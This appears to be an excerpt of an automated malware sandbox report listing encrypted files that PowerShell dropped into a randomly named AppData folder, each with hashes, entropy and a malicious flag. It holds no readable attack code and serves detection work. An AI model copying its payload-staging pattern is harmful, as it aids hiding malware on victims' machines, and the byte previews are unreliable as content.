Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	177008
Entropy (8bit):	7.998969036207848
Encrypted:	true
SSDEEP:	3072:zXGVUsl0W+gsnp/7EbcxNDdAYR1FoZEl5JfGVJUqEjwEvqmCFbSOCR1n:zXGusl0rgsnpzmcxNDdAYLF+ETJfkmqa
MD5:	A0A80FACE1321ECBAFEDC5D6B011B5B5
SHA1:	A4D7ABC092210EEBE0280C174598490C3EB67EEC
SHA-256:	ABAFE219F4914C7372E7324773738D4BD30BD494E4CD46DE6D22E58970C7957C
SHA-512:	0F9E5CD198D36E7FAD6227C0AE4FBA89DAB0FFF2C627AD2738DACBE0F0DE21A519DFA632F891AE37A3A423BAFD88B9733DC78B511B23BFF17F0D43DD19117EB0
Malicious:	true
Reputation:	unknown
Preview:	l<3.1..!~..... .5x....;...85. ..4.ca?Q....D5+.\|$.s/.S..oa..>..6X....9n1..[..mi..w...d2....0.\....@:...3.+..a3....P.y...[...#..v1.7r-.0._..&rA....y.^../....WY...c.%.H...q..~.xf..mj.T...X..;qf5#...0...n..z.%.{..o..I..6?......TGR...YM$<.`..:.N..~S._.w_.m..ob7.X)C...i..G..d...6.!..s.Ux....t...^../ .....7}.J.u].@...7..C...d.rb)...A.Y..X.\|<V!K.k2x..d.P..bEz..!..U...v:\Z..R2.....0......\|.I......?..V.>}ws..X.IAz.hp.!.......{$.6..".@.tqzJ...#%.Sd.z...B....M..O1...'.:R..D.w.u..t.Yi.......i#.N.+]8.?x...F...H.\@...;.VF.._........R.4.....O"Y....j..L.~......<.1-C....[..$0.......6..q..n.......Mw..xs..R.m..bX. .]..f....K.M.t..f>...`ix....f.P..........FVeSpc$r...x.B.%....p. .m..,...Y.""1.@B.!=.3p`#.'Y..fI5..s...g.2.........S..9.d...=.."..L...J..6..T@W.NQc..lQd..;.\|..xl.E....W."..%7#.(P.V..l..5/f\..lT.[.x=W`a.PI.....<Sw."...C......1@^\|.(9......#.5..N..y.2.q!5}.....cS....h~Q,.*.L..AL..+.j..mc..O...._.X.>..Gl..\z._.(wg....c.l....l...s%c#..{..x`..-Ev.]..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NEKtWBfuDaqRPXZdxM.ediyQEzLOuTn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	54566
Entropy (8bit):	7.9963596160038115
Encrypted:	true
SSDEEP:	768:xLWDEHJWRA7MZ5tutX3fRquOX9xbQnos1tkORqWJiLWokFApD+LSZQYQ82y1dvuV:kQHJsAAZ6tX4BX9xbTSCSGVPxj2vZzX
MD5:	9C98207E365484A126E0D344651ECC86
SHA1:	3B65113C7944D8C998E5EAA74845D99E3AC4C2F8
SHA-256:	2A9E5B61F8DA807F19BE051F2A8E54AD2422648614422BFE602F3E7A7F024C8D
SHA-512:	B973F7736846F9A2B13FB6E37D8120A5FFDEED5F1A114A9D4CFE1F9F6F249CA414DB86071E79500EB50583B96D05332C33E3A926EC3AA65DC13C42BAF46D25FD
Malicious:	true
Reputation:	unknown
Preview:	D.D..{...S.@.@.$`+V..E..D.r.l^L..0.{L`}Z~Z.%n.P...t....AX...w..P.......Z.R...."...\..o.w..~Qi.s...H...Bx....c......5.e..../......uq....AO..`kX......&...a.u[..p.#.......$t.>..K.h..~.....$.K.....Q.....QC.......!...'...w.C..L\q.0....C.=.4Xg.U.R..L....).OL....$.uz...\|1.I....Hr....A..^.t..Q..B%..A...n.e..g^.y...S....-S...s1....+0v.?b....$......8...d.J.#....O.HL\|H.!...G.._...C#......`)9.(gH...(..^..[c].d..a.a,..:.T\..l0.../.d.......z.....j........dqcy...4...<{.6..#....`....F...@G.Y.<...A....M.e...L....0F.....4r..F,...}.%.O....u.Lm]H..M.\.S..U..[.8.....x.Z.V..x.......2.!..P5....><!`..W.......'$.xes.Y.=..&'ea.aV.;.N9.>T..+.;..).j..(.W".0j..]......T.'.gl....6.T.$.,.X4+i....\....P.;..h..v..M..mC.8.b}Fg....5Q.....o...j!..{..A.\|..3J..&..N.pf..x...)..f@.e......N:].6.I....LWz...[........:.\.G......7....J.].Xi*b.8.EJ..V8..Y+..fa........I......1r?...b.lW....zu...qfs.@m.B..k.~-.'..JL...JV.&jX..O.0q....wJ.`....w....{...r)^yFe.2..IM.4j.....#.I.F....-..6.B.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NdyljBwDAWTrKuPn.UGVysArHdXtRb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64423
Entropy (8bit):	7.997217282366379
Encrypted:	true
SSDEEP:	768:w4deTPZyW/BI7S4fWOaUPiEW5esgSMRV/wJFtU2nIAiiUk/35Ebu+s7EBuX:wPTRLy7TaEGWvwJFtTjEbXs7CuX
MD5:	8B7ADDCF5F7762CB7956B5C409ED702F
SHA1:	7DF48880C8BE5E2E01A30D3F545D206E4498B62B
SHA-256:	23951E602DC73E551114E34D11C3D7FF5119CD2DD974B2DF8A9B59F3EF81E381
SHA-512:	7D0222A2702ADD34838E79AEEB9971D1B8CBB1C3E4F65FA856EC13D004DB1041AC6455E0BDA99BAD4D902C39F993D805ECA891ABCBAB83A5C55666A0A013F2E7
Malicious:	true
Reputation:	unknown
Preview:	f.$(.-f.m.MyF,".7..T.W"..%3GS E.h.kB.k...RC....Jb....w...\|LKK....7w:X.<...].#..F...p\R.G.q.O5.B.O.aw..:..........Jd.u/c....^.Y......J.!Z.-.._/'.8?.B.2..........!...B2...L..o.D.........y./F.Jm..Ky...S0...f,.n...8.n........:.. ae.i.?u..t..5Y....{.^..7^e.W.]X..F.t....}. ...b.<.u9...n..0S..$..:...a.N.. R{.)L...!........v..$....#\..c..........9!.j..e. ..k.......(BH7..........B....MK..z..t%.93...C..Z.^S..Z.......g.j...0.l...(..._..j._'..~..sA.K'.#5W.....I.@../.f'....o.@kT..?..l.]...4.N...t.=......'...f.(...Jy.^.r}.Y..-~u.2u....;....Z.Z......&b...Z.X..&4.E...w.m...#3.^.u.b$.N..0......%8.....A=\W..Z/H....#.6%z.....O4...kQi'..B.3t.8L}P............m`."..p..............V.l.....W.".&Q!..Zh...58....I]..}.....<Dv...5.`....(......J......7..#{.G....}....... h,,T.!.3.-&n=.. ....O.Z.G'....&...Op5.t....3?.P.5Ry...&.F...k?./H.W..nM\|.l."...p:.QX~.w..~)k.q?.a.._}....f...@m..c...D..RE.m.-........S.>...=.....6.G>.z.."..nyBI~>x.Kb./ei.4..9..R~...FmB{.0.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NfYKzQnmhldLPDCUJTR.ghVmBHMpNrlUz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	63930
Entropy (8bit):	7.996210737068812
Encrypted:	true
SSDEEP:	1536:wYtyFOVKXMw/0BLX0NZHqo4vK+9nSUHRoSRPnbylMzDLYaIFMNV1JT:wbOVMsXOZKNSOSsNPGMfLYap
MD5:	F1333FC28A43188CE5B793EB0265AECB
SHA1:	DF9310D543A34881108A5BB7A57ABF6570321CF6
SHA-256:	C812C3A17F8336BC9AD86C7169235EB5315E01DC14B75BBEFD68F67BE1DAFD58
SHA-512:	C45479A05E1C5C3F87E3111964802C5A4CC6B26439996590A2CC3DF600A1B0028B42BF2CD3A898A8B82A0E3D712F4D066BDFDEEAB29CF7AC977C8FC0EF7DD836
Malicious:	true
Reputation:	unknown
Preview:	...41..;,e...@..FE..F..o.R._......sq...`.;..u.).C5.y...\|..r\|1XU.:.=Dfy`..c.).`.._.}.iv..c..=....Y.j.4..J..S........V......NYC.d.M.+...\|.'...2V8..u.R._0=...?.....m7../yTx.^...\|.!21&.e.P.......X........4...<~] ..}u.....wu............O.C/.8.z..2..9...."..h...f8./..s.<X...z.......,.q.xj.7a.....,x.?N.W../....Qs?j.....e.s../...>.d..P...:......m7%...Bb.Y..]23........1.Y.........N+.D.....?..........[2..M.m.N#'7.?a.....6A>.....+B....qD..3..m...I._...j%.G.<.R....<Mh.s...L.%..C..@{D.K..*`.7Hu.#..SR...L..p.uM.v..m\|....`...z....H.-...U...-[=.....d..ic... ..F..-....#.....$"9....Q~[`A..p.\|.%...u.pF:8aL.?o..]..u....l.a.f.l..S.W...c~..1T .)r..E..........."...U.)I..L...........v.......2c.d.b.Z3r^........f..Ft..3.1..\.H.5..k.H..........@.aV..........d...B+..WK.9%3v.6,..tS\.i...9."ZE. ......a.4..]rk......-......(o.e.l.R...S'H.#/.J.O=)......Q.U..`..6G........Y.\|. .<..D.:..w....,.B.A.5.P...y1..xl4..\n........?q.e::^W....g...CX....qs@}.4<

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NhzISGMiWLK.FoSMUiBjIOqvPLGArWZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194032
Entropy (8bit):	7.999051280213038
Encrypted:	true
SSDEEP:	3072:qdbOaG90vZ8oVDq3QlTyK4ZYqeuJObWQVR4MpMoTpfK7IKiM9osrx:KC9X4D+ECOnLNVRfU7Ivkosrx
MD5:	4C9064064307604B4BB72F1E4BD8E394
SHA1:	606E6E3FCA2270CA7A3756ED95D408A83ECB275D
SHA-256:	8CEFC621A832748CF192DA4FE21DD52EDBC24A737AF799737C39C9663786EBE5
SHA-512:	481DAF9FC72B1AA4E9A7072F671ED6E276B56EADD826644D8BB7CAE73C3AF5BC3A530620BE553866A9950846E553A0353BEF5921E9146BE37E8C26B33E19B0FE
Malicious:	true
Reputation:	unknown
Preview:	..x/.../D..[.]+.@>..y#.9 U.....KT.j..t...\|.......N:.....d...R...q..F(...s.JLk.Xh.b..TN.w.!.n......c..f.$.).5.Q-...#7.#.I2.....\|N..w.7.;.t.....A..:.e.x..._.\|_..Y...8....Gg.{Sp.f..BvJ..5.q3...uY.....G.... E....Yj.;3..3@WvR1......^....k..M.Y...<V.........y..Y..K8..2.o\.D.l..5.a.s.1.Y.....e....s.e..E6NA.N?.E.V...o..]8.dN..Y...7...=.....:.h.....mC..%.._b........Oli...R\|Y..d....;.....U-.5S:F...'L...V..T.A..T...C.......\|.B..:a.p..~s....T393<r.s.C..........Z.m...:........NI..s..M...t..[..@...>.S....i.....B3. z.....+.R...1...1...}....%1fr.Xl...^..x.C.RP...$p9......T....L[...$].W.E.5.-J)..9.Aa,..W.r.V.....%{K._......&....g..b......../.Wo...^i..&..0#..`...r?Y...o..A.(. .4L..........N....0.....9..Jta.....gC.%......./U.1...Yc. .FW.yyu./{?E.......W.y..ABw..^.,GQ...zY.......~..7rL.....086.......bG=.m..\|...z\|../W.b7~x...B#.&........4...M...q~...h...i5@.vU").w..."..D0..#.....P.(G2Fq...\|....>.......N-p.4..i..NvOnu../...9"=5..^......._.5..C.lw.T%.X....2.e#

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NnZeYtubScVM.OCGyBpNmtehKsdX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	56891
Entropy (8bit):	7.996941133236825
Encrypted:	true
SSDEEP:	1536:9NuvU081DPytAg9Nr1btZVx6JF7lGZx2LcSbq8Ds3r7T0:PuU0A9g9NrRtcn7lGrW5e8Grf0
MD5:	95D429F8EC3B47112D75433798E7CB17
SHA1:	DCDF8A73DD54FAAE28476BE71489A9E375F60E30
SHA-256:	4AE9894D6794429746F3B8FEA2E3E3DD2184BF08F5EBD098EFC64072A4349810
SHA-512:	E1D3B2E51E3B5519DC23AED9471083F28C61574D6F74F8468D7C18020C7FEE76690B2C2AE3B4D5665097C196D8929F1DAB23390F5FD7250DCFE9A91F94447022
Malicious:	true
Reputation:	unknown
Preview:	g...:VRF.i..:.l..].j.9......M..Y...".k/.&,....\|..._.W.-j}.tA....e9..]..Rg...O:.e...Z..T.V....-4h...jp'nl3.. j-...L04T.d.FU.......~.....T...{..v7.t......$.n.V.I2G..'...f.Ri.jA.+.1...c..j2..L.Hc....n...f...-*...oP,6L=\\;..!6Ry.hW.;..r.UM..zl.....gvXQ...p.dS^.A.W.N.z.9..W.b..bA....2)......\Q8.F.p>M...g..!\|n.......W`$......F.......<.Rr..n.z....{v..K^.(.xoh...F....n^..,.&...........q.>.(..........z...1...b`....Fhk%.0d....QF&58...d...r..&..q.....xl.......q..,'.Bz.I&V.w1...Nm\|.N....I3O..xS<.5k..K.P.i!sSm.H..+..lZo\..G1B&.;..a/.!a/.-.X..f.?.M.J...D.R..kBC..S....A..,..+..+.....o.d....3.X...n...Cn..)@.4..hJ..&.....:...A{z..q.[.N.i.K;.o......q.p......Cl.......hcQ.Q.F........"..o`.D.N..s..5.8B_.S.V.Rj.Av.....x.......6.._.g.jm.C.f..+Q....M....#.Q.....fdF.k.<_E.DY...2.Ud...o..KY{.w..oq.oW.;^]....&)..~q>>j.......z0.i....m..F...1$/....H0...U.t{y.I..Gm....W8.;.G.V......9.........._.....J.7.7QaP..u0. &....JJ..+..f.l.).Cx...%v..W...8......c.......-L]-...!`

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NxrMydnCDUWLO.ifkevDhlaCPWJKQFz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	59203
Entropy (8bit):	7.997409433167004
Encrypted:	true
SSDEEP:	1536:NXyaz48garnLtodWBujMhttBq8TQO3FHr5x+2W7mvI8p0Mg8U:NXF4YoWPhttaO39rnEY0Mg8U
MD5:	336BAC263BC491F466817FE877A75985
SHA1:	DD014DB4F1B15EF448CFEB44B0FDA8262B4F1B9D
SHA-256:	120CE6097532D396E974033B72B66E1F52856EDDC43D7E946ABD99FECCF60CA0
SHA-512:	2CC6E6592040E2D7947FF2BD3C556C8F41D4D49273CDD1A6993126F6D5DC2D8449C669C6575212F4DC49CB0E6C0A643024EA263B73D061FED54EF6DF3B42893F
Malicious:	true
Reputation:	unknown
Preview:	.`...'0..Q;.KqG(.J.o.E.S.<........1..U4..oTny^....3......l..L..W..{O..q;.&0.u.A.........N.....Z..........}.G.H..v..PZ.@...#\|...].SE....4.....\|..V.CyV...!..M.b..W.....O..Q4....A..7`.?.b.....u>..9...NZ.]..?..7...>...v...i.4......7............3....!...x..)(..\|G.W..A8>6..Y.-...M......Np......V`./8.....x.J4.(.........#.~1.O..,...>&...o.%...$,...}$%.k.l].(.}..`?.....C..<.#,.1m.u../W..F..../.]...b..<W':}!e..x.t...r\|..]5.k..E.?...#9....}gB./..r..zwg.".T.u...n.h.....!}.\|..D.kAM....f=.2b....H.l....Z........P4p.....i.^.2...`G..uduA.6..{V.o..K...;..Tr@..l.MQ...u.....a..&.......). .4E...v).;.j.{.'C...^..H.Kq...`...w..-..CcjS.7,.T2r.8..\|........A.U2.>....D...N5.I3?..ob.I.B....xT...h.\|G.t.?T.p....d..?{.2..f_...-.H....2t.D.m.U........JMz.t6........6.6v.'8WO....!.Z...V$.Q...0v~.-#]...H.&A.%*r...5.'.<.6fu.....3..8L .."..n.&N..H7.T!0..@.f/...L.X.2....('5[@'.5E....p...cB.w.....rf~....,..CK..1.iN.t..{..-.J...rf].......lv.iJJ...+A.e....D.{gU.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OFhiRwEuxSNIGK.EkvxdViBQT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	68067
Entropy (8bit):	7.996891814854924
Encrypted:	true
SSDEEP:	1536:VgjJgRD7Lx1pdyl9vl/n4Cj2sPyKCTiI0P7Y8mwfZcNdhFBATnb:VgjJgtR1pQVjbT0iIwmwxqhFBATnb
MD5:	987B2B02BED54568689DC9A47E7C5EF0
SHA1:	7AB49449B0DFA95C0B1AB58850C4D5C0C69FDFF1
SHA-256:	7F4F34B0D1260056DF1D0BFC1517F947A5BE984A0E421E479FBD30AFA304727D
SHA-512:	99BF26965A429B183F08473647A75CB024F780AD314567D60EEC06CF75EBA47D1CF7CF61AAD0EC0D019751E34668754DB41110F8D1B8EF86CD4E3742EAB0BF36
Malicious:	true
Reputation:	unknown
Preview:	...j.3,.y r...X0L.\Q.J.$..hV.....Q..EA.&.n4..B.{g%w.5..IgF....u..24....6.m..0....fS5.X;..\b>........:l#..X28. ..$....{.3.S.W.&..^>` CS+2%..`Z.....s...6P.......xS..[B.vox..I.5..}.f..?T)t.Ju..u.Y...0@w..O....dX.<...K....].$..Zd7Not?.=..J..>He5..........c.I\.......4.......2QH..7@].l[.y.w,...?.,.......D..1h...r....Mz.q\|.<3Sh$$C..k5>m.'p+H&vm.,$..g.m.....{....D..#.JX..%..qJ.f../....H.Y......<.e]%.O...c#.N.H..g...1......5./.5hL._.Ups....M.v..r.9\..Hx..q.3.j.OF_).X.p7..a.Oi..;...\.i+..v..Mf./l.`...P........v.n..G..{...*O.....!\.R s...a.$..:..%E$!z.. ......_.^.....XM.v./..G.n........+..9.. ......F.......`.2^7b..3e"..<..1.Y.......'...C..2R?_9.9...s.Q.T..,....1.J;..!\|...=.....fKF....cx.nC....OJm.e8.Eg5...^FA./.^`fL.....P...bE~..7....nl..h..,/yH6>..}4.3.....;...,......K.U.d#w..+.....Y....O...9..SJw....2.RH/.H}@..KE.....J......#$TO...bds....e.]...jyu..t........#).n)..0e.Y.0.P[............U.P0A.l..E.:..-]D..4:...xJ(....O.yWN....-.~X~.7.G.9...>/.;.]Dd.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OJutdhroBswzDZ.ugXtIZJNvTlVCPhc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	136592
Entropy (8bit):	7.998518453231866
Encrypted:	true
SSDEEP:	3072:seaPEH40F1kswyM7xGdn4irax4BMTXYy2JfYy+mEcguZJ/79/vZ:/YEYE1bwyeXcaxmMTHtyRgUJ/77
MD5:	3CE2EACBCA4D0E2694ED7C927342FE47
SHA1:	9CC889ADA0644A0E535D9A08159D7D8B6E24A7CD
SHA-256:	AB3D13CC4707C8FBFEA8377CB384BB7E75F4DFB40480814EF0DC749F021F806B
SHA-512:	548826DBA5A17B41A61CECB44B53F0F3D1E3FA32BB89A7F47B99D6AEC139E171D1E1B1C588B666B01813089498C958A00FCDE747279CA99FF98ED3E10364C98D
Malicious:	true
Reputation:	unknown
Preview:	:0.g.3_-....f?B.{i,h0.....\.i..".).;Z.:../....A...3@.2J.>0..&.+.....T..L........"..K.\..R...\|G....2Y.j.Z}c..8...k.2...W...#o......7..a.....j3..."....b.5\|..Gvgl.~.#.Y=.?..T^JQ~6z...\|.SX...F..5.......A....1.....k...q..)}.^`..B^.0..........6...F..s.......p......r.k...Es.(. U.t...A0p>.>S..P.UxIW6.....u..^...^..#.y..Z.D{.5"..Q.... ..%.Yo.D.8S...2..Ud$&.(.@.......h......b.w.B>.......`..F.zeR'....J..'....\|.'.K.j\|..ts.....DC...'.8..x..._TJ..P...<.G...br...h.......r..x.CS...G9D.T...&.j.&.nYc.N.6....-.n....F ...6<.............P-]z2.S...h..r..s]..7_...HQ. .A...Y<.m. ....r.H{.....j.t..h..>'..~]e..(.O.4#.@.b<.Q...&.I..T..w......R..5...3.VQ.0.Xm.kTH......u..Y...........\.....$.[W<A......P5.tG...D...L._.. ...H.X.M.IB.8...Z}..K_..Up......S`".d......[.5{.(aB....g...:H.A1gp....R.\.Q... .%\.\.....i.N\....Jy..T.....1..E"...h.1K'..=....(..P...m.6....sC.9V ...GX.j..H...e<*....gVczC'2....x{?._.>......lR6..5.WF5M...8....)s.%3........'..s.... 4....f......T-.O.o.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OXurUWfqiLtKvg.xZAqPjiHMG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	153310
Entropy (8bit):	7.998841156432827
Encrypted:	true
SSDEEP:	3072:ERl4hidCNQ5nnS92W+SF0AnBE+Vh5sGaihCVO9kWUiD5PmQAhhjy5KI:2lFY0neaSJ5v7aihCV0ZUiD5Pmn5yEI
MD5:	919FAAFC3825C1C319E170384E2504A5
SHA1:	F7BF387BD9E22C65FD34A4161CD3EE6F9202ABCD
SHA-256:	D8355D453EB802FD661A063A0270D6C23BC6DE6BB4B24F1F6F0452A5CD9744AA
SHA-512:	88866BE9555AFC05A0983F6E6876F5272C87E0EEED2DBC779AB327E52594F2417249CEC9DAE0387CCF596F310E1C173F9E9926FBB45C764314876973BB04C1CA
Malicious:	true
Reputation:	unknown
Preview:	x.R...;.>O..Nx3D..<.v.s.d..L.].`......y..'.b........../ .T$.....r.....%n.L.....@......(.wS%....7w....q...M......XQ[.Q^..C....@4.'.sm..`9.a.f.a.d.a.?....A...r...B Mv.\.au..x.&/...m`...zC.......x...i..p..z..x....p.U.q.I.B....9........\|f..u.?n([.$c.....T...............9j....m.....>..v.Bu..YLh..~..W}P.:...Q.%Y......d0..........A.N=...$u....!..,{..ME.....(..y.9...4?...r.q....c~...?q\|...hWpu....,.!G. A.j...R.e.....J8j.$.Y....B7..........u.. .X....S...m......^t.b.j...Y"T?S38...0.;6.%......n.rTDZi..7..0aM89O.B....9.i.hr{.Z.....Ex........`...V.......,H.{.VY[..................T..].=\|O..>s.i(.v...y...\|......,...V2...Q...+.M....KV...c8f..-.Gqb4iD...'De.P\|.).!.I.t\PBI...-..sO.=t$.....<.R...(.....F.y]..l..qY0t.1$.Z].\...~.Cp8.f[.....?2#...}!..n..e.3~~..[9(r.y....z...X.(Xr..m#..(Rw......."P.L.7.J..&m.JVt.S.o.<.P>.r.61.....&.m...G2.,...od...iN.....+.R.]~.\|0.&M w...#4..k...=<n..Nu1..2...@c.=Zj;.D...`.M.. A...2..S.m~T./v......;..ym..Z..JmC...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OdQIpiJKgGjAyuCS.kpKeavduDMzJU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	123943
Entropy (8bit):	7.998484427714996
Encrypted:	true
SSDEEP:	3072:iXSIONOPsS5UaYl1GYPtIwbGXzB4m0hUm/I52JSj1xCw:ikNuv/YvGRsGtwDAwSBxCw
MD5:	608134655C517F353EF2203518A1D35A
SHA1:	57C1885638CA0185896F90F1F01167DF5AD73CCA
SHA-256:	3A4E22AC8B666466198E21F8F5FABF607D51A2E7568B0DF570BD134DCD8B002C
SHA-512:	CD3D444CE5765BDBD4A73C5332FB2F39957098ACE884E0B290B91E9F9E7854959F3958D24FE487F574F817AA10EFD336393974976E5A860C09660D3D77495088
Malicious:	true
Reputation:	unknown
Preview:	D.......y...[$.%ru.v.......R.F.......[...m.`..B...`n.....n.I..WW.c#.....c......u.}'G........8.....B...is..j.L....mv^..>..$...X...z...V...o<P...^..S........;...`Wl....K....q..G}.F,....].Z.4...Q...\..p...d:. ......\o.$.....lJG..z).!.....H..W\u......h.....}.Kh..."."Ax....A....R.e2Qq.<Gq.+.l.}.....m.........N>@.\|+HH.....CxJ.+..Y.v.....W/.`@-....S..t..M..p.q .w..,..$[O.J.E.p..D.4P..!.Cr...e?.Z..Z.p...U....c...B..d_...._..UQ.\.'...7X`...or9(DZ.b.sh#Zh.Z..qd2.....>}Zx@.K..>.7..X.4.f..d...[..Y..R....3..eP......C...a.w\|N.<...n.Lm..$..+...3.t..w.v..C....=I...I.y2\...o6..u.....GYi.Z.[a....t....q9.....}.....F.K...oO`.\.TD~d03.M.I.?...D.w6..6.._\..7]!F.f9..wl..u.n.J....w`.5.....#t.0'EA9r&.B.8.xM....mz...$0+....M_.F...0\|)_k'.t[.H...u}_..GR..u_.I.......P[>.1.._w.M.F...\..)i...YB.m..QD.J.>..c..I.'.R..<k.i...G..b...6.x2z....86 ..'...0(..VLc.......e\|+( ....>...x.......!..\|...)v4.......xr.....~.?\.A....;.Z..2.>].......AB2i.)y../...........b.@.b^....Sj..g

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OpqocLVAJQMamsnfjz.UAlVyborGd Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	74867
Entropy (8bit):	7.997650204085353
Encrypted:	true
SSDEEP:	1536:5at/Ib6W2F7jqJhRm9Vq20Sx2+dtB56AUb6P6MqiTeSa:G/Ib2YJhRmrq292YrcAsiyB
MD5:	B38902006DE62092D7CFB97C20F56CAC
SHA1:	B1B15C1912E8BE11BB91F0B5B8EB0AC361653A0C
SHA-256:	F5B166BF7048A088FB3281F9005527D413E4463A87ACA1C734F89219A524BA2B
SHA-512:	3099A80E7CDC1DE485BF590FDB047D552866C72D1F4B4B10DB05FFCC450506502DEA8A4D7186E7E30CA7457CC7AE0F6CDF365DDF6841A41443251605737283F6
Malicious:	true
Reputation:	unknown
Preview:	h`._.Q..[.w..KZF.h..]@".......P..`......?..O_.Q.kP...=.{...h.7.......#.H...`..g.....I.._..pc.Z.f....V..x...?6. 7..+I..S.,.G."+].....\|.z.(...V.PNP,.\..~J,....e.Fg.7.@.^!..}..L...Z.!.P...c.0...p....q....C........cji.<{...-....3chn..)...=..F.m`R.^p.T....[a...U.>;...9.M.o....,...b.....J=.;$im\.P.G...T-t..5.@..&.&.%.......:cPiPF+.....~.z.JE..{6.).!....sy(..lh..w.J.f7..t....?3.d&.._G...F{.......N^.^.z3p.".....BIw.0?O....f.>-.....c.+.....&5..5'O...W.....yt.....y.nZIv.Z).h`.....}...'....xP.jo...c...%BH..,...s.$.HS....E....].]!M....Wlw.ci",...uc'.....5...=;f4L.....&..9nk.f.q...E-...O..9..5.w.5._=6.5....v>..!lb.p_..<.> l.<8...a.......O8..t.m...6.-A."f....Pb4.d..g..`..-..j...e_.....V.;F.......UM..z.g...h-=....8....X".....S..d...X..D....v.}.Z...Ww9}....^..or..)..Cs..-j...)J.L-c.p5?o.i.(.~.$].~5...j4P.=v.5..UB...4....-.^>s..5...;..1tz..Y.;.6......U.W"3.........ks.\|..^.....(....".+....\...u..e.;.e..Ow<..........c.K.e2.....N\U....^."i.l...{.....h.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\PMRjaEJsxymrZ.pniMmNjhyCwTPK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88078
Entropy (8bit):	7.9981492339353135
Encrypted:	true
SSDEEP:	1536:zAJ5Jb+beTlkuIVGJSFnAqgPqDbQetQr27xMrtLhBm4C4+usB8QsI2:zIH+SJkXGJSnFjtG27xG5jiBnsx
MD5:	9032D04B0ACC834E8ED53F1FE1D06540
SHA1:	0A195FDD8DD19A04A148B23C6B05890C01640D72
SHA-256:	CE2A03EFBC071CCF6EFDC399D167B9372C9B9379B93A9E65B838A65996B1D902
SHA-512:	4E5382757C1228D27CB06C2B5D1461808B139522A3D758DC44B56B5D3985F9AA1BD8E0EC958CB33CD48AA8B5F389F85E1CCEC972C98AB03CA0D9C15667CD4BED
Malicious:	true
Reputation:	unknown
Preview:	p.p^.u..Sp..-rY...l.[.R..#....1.0...M..6.o....%.....E..0b.ip..MBg#.%...7%C.3.l+.....n....@,%...".O...\.j......z... p...m..l._(....d...r..}(.kK...?....$$....y........W2..%.T,l..0.._.Y?.G..tj[.,.fs..r..$.R>..C._...Y}.et.1..D...........5@6.$.1x..M]...5.N\..~.v.#...O..H./kt.W.H.Xj..[...3..U..Q..rZ...O......\|..T....N.?......".I...Y.iU,.......5.7rE#y....Z`.....\|.....g.R.4.pO.H.wt.v...Pr..$..j:..C....Q.....k..i4 ....M?H..e W6Dd.Z.j%+<.9a.S..J.I.B...7..\Z$e@.'g.+v..^..~..8....@....T{.&.........Vr.Y.X..1NJN.^..$2:&.K..`....DX...G.z&\.#,q.j....m.L....t..Xb......<....(.I.f+.C....Z...b...uk..YKN.Y..?.p.......V..S.M..GDh...wk=..}.6..^}..n...=.....Z..Cz0.. ..!..._85....}....d..i...?.l.k...uo...9.0.....Q..BD.7....N..O;.wQ..6......7C.6...h..>..D.....P..8a.>y....t..h.......g.Wc...N.x.{.+..........S.h....).NL.C....vA.g..3..`H...w..E...Q;.F..C.<N.P....6fc.jo..Zq...s..k.c.>..S..C?.(....P}*.....w.R...8QP..f.tW.].\|~I.- d..@....(.x.07L...sN".z...n..(Env

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\PzKJsTnAycDbqMaXF.JilIzScewvxTaVLEyu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	197559
Entropy (8bit):	7.99901879090997
Encrypted:	true
SSDEEP:	6144:pC0lUxjaqFqqGdHxVWeqbPoIytWTbKgNvpxV0:ISUdQfdHb8sIkWqgNvC
MD5:	F5E5593ACA85D1EC294EBD2A9ED80E65
SHA1:	93AC45247E9EC989CB2BAE03299BB9FB717EFDCF
SHA-256:	E3A1B37399B074A07F1E1252745BE63DDB2462983D01FC8290F8447934968F0E
SHA-512:	56EFDFD1AD1A400260954126439F4830380B6F0BF56C0C61DA462022DC8CF1A5F3C1AF94778B4ADD6DD5E7135E225C2551F8686C6DA07BE196DC5C0C0B85964E
Malicious:	true
Reputation:	unknown
